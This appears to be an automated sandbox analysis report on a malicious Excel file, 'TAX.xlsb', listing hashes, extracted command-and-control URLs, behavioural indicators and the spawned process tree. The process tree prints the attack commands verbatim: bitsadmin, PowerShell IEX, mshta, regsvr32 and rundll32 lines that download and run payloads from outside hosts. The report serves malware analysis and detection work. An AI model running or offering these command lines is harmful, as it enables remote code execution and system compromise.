Analysis
-
max time kernel
105s -
max time network
108s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
03-04-2023 00:30
Behavioral task
behavioral1
Sample
TAX.xlsb
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
TAX.xlsb
Resource
win10v2004-20230220-en
General
-
Target
TAX.xlsb
-
Size
10KB
-
MD5
1e1afc93c8092b2c7e49a6d3a451629f
-
SHA1
081d3ab46a0641d952ca28eacc6d4ef3516fdfd0
-
SHA256
ea0923854208956b1f563c5301bd0c9a8561128b7bd48c5b475ddeea29da8a1c
-
SHA512
5ca2f6827fc93c7645660d3f787c1d074596ecd90b5b7c03748f46def274dc1d4edb931251202a9c50fb925ba2c9dda855cd42a0c90d7c313f24aaa93823150d
-
SSDEEP
192:F5ssEP3p0o7VhgmK05bVhvtrWNpUAWvXSRo1jdF:3ssGZ0o7VhVK+hvwNmvV
Malware Config
Extracted
https://kilolo.site/raw.txt
Extracted
http://kilolo.site/raw.txt
Extracted
http://37.72.175.188:80/home
Signatures
-
Process spawned unexpected child process 11 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.execmd.execmd.execmd.exepowershell.exepowershell.exemshta.execmd.execmd.exeregsvr32.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4676 4260 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1764 4260 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1952 4260 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1612 4260 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1904 4260 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1964 4260 powershell.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4420 4260 powershell.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4000 4260 mshta.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4964 4260 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4916 4260 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2652 4260 regsvr32.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 24 4000 mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Download via BitsAdmin 1 TTPs 3 IoCs
Processes:
bitsadmin.exebitsadmin.exebitsadmin.exepid process 1528 bitsadmin.exe 3504 bitsadmin.exe 1396 bitsadmin.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4260 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 1964 powershell.exe 4420 powershell.exe 1964 powershell.exe 1964 powershell.exe 4420 powershell.exe 4420 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1964 powershell.exe Token: SeDebugPrivilege 4420 powershell.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
EXCEL.EXEpid process 4260 EXCEL.EXE 4260 EXCEL.EXE 4260 EXCEL.EXE 4260 EXCEL.EXE 4260 EXCEL.EXE 4260 EXCEL.EXE 4260 EXCEL.EXE 4260 EXCEL.EXE 4260 EXCEL.EXE 4260 EXCEL.EXE 4260 EXCEL.EXE 4260 EXCEL.EXE 4260 EXCEL.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
EXCEL.EXEcmd.execmd.execmd.exedescription pid process target process PID 4260 wrote to memory of 1764 4260 EXCEL.EXE cmd.exe PID 4260 wrote to memory of 1764 4260 EXCEL.EXE cmd.exe PID 4260 wrote to memory of 4676 4260 EXCEL.EXE cmd.exe PID 4260 wrote to memory of 4676 4260 EXCEL.EXE cmd.exe PID 4260 wrote to memory of 1952 4260 EXCEL.EXE cmd.exe PID 4260 wrote to memory of 1952 4260 EXCEL.EXE cmd.exe PID 4260 wrote to memory of 1612 4260 EXCEL.EXE cmd.exe PID 4260 wrote to memory of 1612 4260 EXCEL.EXE cmd.exe PID 4260 wrote to memory of 1904 4260 EXCEL.EXE cmd.exe PID 4260 wrote to memory of 1904 4260 EXCEL.EXE cmd.exe PID 4260 wrote to memory of 4916 4260 EXCEL.EXE cmd.exe PID 4260 wrote to memory of 4916 4260 EXCEL.EXE cmd.exe PID 4260 wrote to memory of 4964 4260 EXCEL.EXE cmd.exe PID 4260 wrote to memory of 4964 4260 EXCEL.EXE cmd.exe PID 4260 wrote to memory of 4420 4260 EXCEL.EXE powershell.exe PID 4260 wrote to memory of 4420 4260 EXCEL.EXE powershell.exe PID 4260 wrote to memory of 1964 4260 EXCEL.EXE powershell.exe PID 4260 wrote to memory of 1964 4260 EXCEL.EXE powershell.exe PID 4260 wrote to memory of 4000 4260 EXCEL.EXE mshta.exe PID 4260 wrote to memory of 4000 4260 EXCEL.EXE mshta.exe PID 1904 wrote to memory of 1528 1904 cmd.exe bitsadmin.exe PID 1904 wrote to memory of 1528 1904 cmd.exe bitsadmin.exe PID 1612 wrote to memory of 3504 1612 cmd.exe bitsadmin.exe PID 1612 wrote to memory of 3504 1612 cmd.exe bitsadmin.exe PID 4676 wrote to memory of 1396 4676 cmd.exe bitsadmin.exe PID 4676 wrote to memory of 1396 4676 cmd.exe bitsadmin.exe PID 4260 wrote to memory of 2652 4260 EXCEL.EXE regsvr32.exe PID 4260 wrote to memory of 2652 4260 EXCEL.EXE regsvr32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\TAX.xlsb"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/admin.bat c:\Intel\admin.bat2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer myjob /download /priority high https://kilolo.site/admin.bat c:\Intel\admin.bat3⤵
- Download via BitsAdmin
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c cd c:\&&mkdir Intel2⤵
- Process spawned unexpected child process
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c cd c:\Intel&&timeout /t 15&&c:\Intel\admin.bat2⤵
- Process spawned unexpected child process
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.bin c:\Intel\mer.bin2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.bin c:\Intel\mer.bin3⤵
- Download via BitsAdmin
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.dll c:\Intel\mer.dll2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.dll c:\Intel\mer.dll3⤵
- Download via BitsAdmin
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('https://kilolo.site/raw.txt'))2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://kilolo.site/raw.txt'))2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\mshta.exemshta http://37.72.175.188:80/home2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c cd c:\Intel&&timeout /t 15&& copy mer.dll mery.dll&&rundll32.exe mer.dll,Run https://38.132.124.172:443/®svr32⤵
- Process spawned unexpected child process
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c cd c:\Intel&&timeout /t 15&&rename mer.bin mer.exe&&mer.exe2⤵
- Process spawned unexpected child process
-
C:\Windows\SYSTEM32\regsvr32.exeregsvr32 /s /u /n /i:http://37.72.175.188:443/index scrobj2⤵
- Process spawned unexpected child process
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD549e7d5f2a296b59afec08bc314bed998
SHA17f898bf195ffd46ce2d19fad0ce33155f6e47f5f
SHA256394832dfefa5e2e6204b60708a2ca33bb9d2f529664419bc050975f4b80faefe
SHA512f64579fdac0bfebad4c20ad575b8ea45136e295fba950da4cbf84402228a3897b2e2deb4eb4605deb5df93321b1dc15c8a878da36016d7e5e060182142fdf839
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i1yrygnr.ult.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
6KB
MD513a6db759b138f1510229709d38231f1
SHA14e6204c56c133c78362c12d6969a50a77c5abfc8
SHA256575d8625af53ee28b9ab26b1882e5bb668f07f4aec7ae05cd1e22124208ea3b7
SHA512f5955097bd9fb2ad71a8626b6fee491e94f54b31c70a1c097be39d8c9648aae050593344ec50a62e0e3e857896a5caf115a6e5dfefb99d499e0ede05195d284a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
6KB
MD500fed8dd4996964149c74d7cb47fb8d3
SHA1eb96268a1da01a24b36a4fccb62195529f509283
SHA256161a3bde696294af73b06de3960654d19608480d9056a7ba1dbdaa99a9a3e20a
SHA512a306dffdf7f1ef5077fb087a6aa7e83c4382207cdc191bf54af6b80e6c3b7e07b9ff1d894155bb7193ad3cdcf26d75b06965aa96fc501b77b4174b3c5339ee05
-
memory/1964-178-0x0000028226340000-0x0000028226350000-memory.dmpFilesize
64KB
-
memory/1964-177-0x0000028226340000-0x0000028226350000-memory.dmpFilesize
64KB
-
memory/4260-137-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmpFilesize
64KB
-
memory/4260-139-0x00007FFAB4000000-0x00007FFAB4010000-memory.dmpFilesize
64KB
-
memory/4260-138-0x00007FFAB4000000-0x00007FFAB4010000-memory.dmpFilesize
64KB
-
memory/4260-196-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmpFilesize
64KB
-
memory/4260-133-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmpFilesize
64KB
-
memory/4260-199-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmpFilesize
64KB
-
memory/4260-198-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmpFilesize
64KB
-
memory/4260-136-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmpFilesize
64KB
-
memory/4260-135-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmpFilesize
64KB
-
memory/4260-197-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmpFilesize
64KB
-
memory/4260-134-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmpFilesize
64KB
-
memory/4420-170-0x000001DB97640000-0x000001DB97662000-memory.dmpFilesize
136KB
-
memory/4420-179-0x000001DBAFD70000-0x000001DBAFD80000-memory.dmpFilesize
64KB
-
memory/4420-176-0x000001DBAFD70000-0x000001DBAFD80000-memory.dmpFilesize
64KB
-
memory/4420-175-0x000001DBAFD70000-0x000001DBAFD80000-memory.dmpFilesize
64KB